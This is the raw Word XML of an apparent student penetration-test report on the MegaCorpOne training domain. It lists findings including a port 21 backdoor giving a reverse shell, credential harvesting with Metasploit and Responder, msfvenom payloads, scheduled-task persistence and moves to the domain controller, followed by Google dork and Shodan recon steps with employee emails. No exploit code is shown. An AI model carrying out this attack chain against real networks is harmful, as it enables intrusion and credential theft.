        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We were able to log onto an employee account though weak passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We found that port 21 is vulnerable to a backdoo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>r exploit therefore allow us to use a Python script to exploit and gain a reverse shell into the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We were able to choose a C2 that will work on your machines due to the information collected on MegaCorpe’s Domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We were able to search the system </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using Metasploit and find employee login credentials that were unencrypted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once we got into the system, we were able to unencrypt all users’ passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We were able to add an additional port so that we can continue to SSH into the remote user if the first </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>connection we had became compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We were then able to do a network scan and see how many machines are on the network, how many ports were open, and figure out the domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We logged into a Windows machine using an employee’s login credential</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We were able to collect a user’s username and password with Responder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Used WMI to remotely administrate the Windows machines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We were able to create a custom payload with msfvenom and run it on the designated host’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Escalate privileges from an employee login credential to an administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We used Task Scheduler so our Payload will run on certain times.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We were able to crack the cached credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We gained access to the domain controller and moved from the Windows10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>machine to WINDC01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We were able to crack more credentials being the domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_imyjaljwcguc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_53qin3q0b0zf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</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[Provide a narrative summary of your findings, step by step. Include screenshots. It’s fine to mention specifics (e.g., used Metasploit to exploi</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>t a vulnerable version of DistCC), but do not get too technical in these specifics. This should be an A–Z summary of your assessment.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Google Dorking: we were able to collect employee email and names. This is dangerous because it opens the doors for brute</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> force attacks, login attempts, and phishing using real people as fake dientitie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type “site:megacorpeone.com” into Google search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>View the top websites to give us domain information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type “intext:email site:megacorpeone.com” into Google search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>View on the fi</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rst few sites emails of employees at the company</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Information found:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Alan Grofield </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidRPr="00CB0356">
          <w:rPr>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>agrofield@megacorpone.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Joe Sheer </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="00CB0356">
          <w:rPr>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>joe@megacorpone.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Matt Smith </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidRPr="00CB0356">
          <w:rPr>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>msmith@megacorpone.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Mike Carlow </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidRPr="00CB0356">
          <w:rPr>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>mcarlow@megacorpone.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Tanya Rivera </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidRPr="00CB0356">
          <w:rPr>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>trivera@megacorpone.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Tom Hudson </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidRPr="00CB0356">
          <w:rPr>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>thudson@megacorpone.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Shodan: With the Shodan website, we were enumerate Megacorped’s one domain. We found out important about the system (listed below)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In terminal, lookup Megacorpeone’s IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">In Shodan, search Megacorpone’s IP address </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Information found:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ports open: 22, 80, 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SSH Version being ran: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OS Server Debian</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Version of the web server running: Apache 2.4.38</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vulnerabilities on the server: CVE-2019-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0215, CVE-2019-0220, CVE-2019-0217, CVE-2019-0197, CVE-2019-0196, CVE-2019-0211</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Server location: Montreal, Canada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
